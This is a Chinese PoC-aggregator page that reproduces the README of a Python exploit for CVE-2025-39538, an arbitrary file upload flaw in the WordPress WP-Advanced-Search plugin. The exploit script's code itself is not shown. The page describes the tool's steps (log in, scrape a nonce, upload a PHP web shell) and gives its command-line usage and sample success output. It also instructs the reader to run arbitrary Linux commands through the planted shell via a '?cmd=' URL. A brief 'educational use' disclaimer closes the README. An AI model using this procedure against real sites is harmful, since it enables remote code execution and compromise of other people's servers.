目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2025-39538 PoC — WordPress plugin WP-Advanced-Search 代码问题漏洞

来源
https://github.com/Nxploited/CVE-2025-39538
关联漏洞
标题:WordPress plugin WP-Advanced-Search 代码问题漏洞 (CVE-2025-39538)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP-Advanced-Search 3.3.9.3及之前版本存在代码问题漏洞,该漏洞源于允许上传危险类型文件,可能导致上传Web Shell。
Description
WordPress WP-Advanced-Search <= 3.3.9.3 - Arbitrary File Upload Vulnerability
介绍

# 🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Arbitrary File Upload

**CVE-2025-39538**  
**Published:** 2025-04-16  
**Vulnerability Type:** Arbitrary File Upload (Unrestricted Upload of File with Dangerous Type)  
**Affected Plugin:** WP-Advanced-Search by Mathieu Chartier  
**Affected Versions:** All versions up to and including 3.3.9.3

This vulnerability allows an authenticated attacker to upload a malicious PHP file (such as a web shell) to the server using the import functionality provided by the plugin. The uploaded file is placed under the WordPress uploads directory and could lead to remote code execution.

🧱 Upload path:
```
wp-content/uploads/2025/04/
```

---

## ⚙️ About the Exploit Script

This Python script performs the following actions:
1. Logs into the WordPress site using provided credentials.
2. Extracts the required `wp_advanced_search_up_nonce` from the import/export admin page.
3. Uploads a web shell (PHP file) via a crafted POST request.

---

## 🚀 Usage

```bash
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

```

### 🖥️ Example Output:
```
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
```

---
## 🐚 Using the Uploaded Shell

After the upload, you can access your shell like this:

```
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
```

Replace `whoami` with any Linux command you want to execute, for example:
- `id` — shows current user ID.
- `pwd` — shows current directory.
- `ls` — lists files.
## ⚠️ Disclaimer
---
This tool is intended for **educational and authorized security testing** purposes only.  
The author is **not responsible** for any misuse or damage caused by this script.

---

_**By: Nxploited | Khaled Alenazi**_
文件快照

 [4.0K]  /data/pocs/5b7af00c26cd7c3b0a970e72dce34af48b81dea9
├── [3.0K]  CVE-2025-39538.py
├── [1.1K]  LICENSE
├── [2.3K]  README.md
└── [  24]  requirements.txt

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。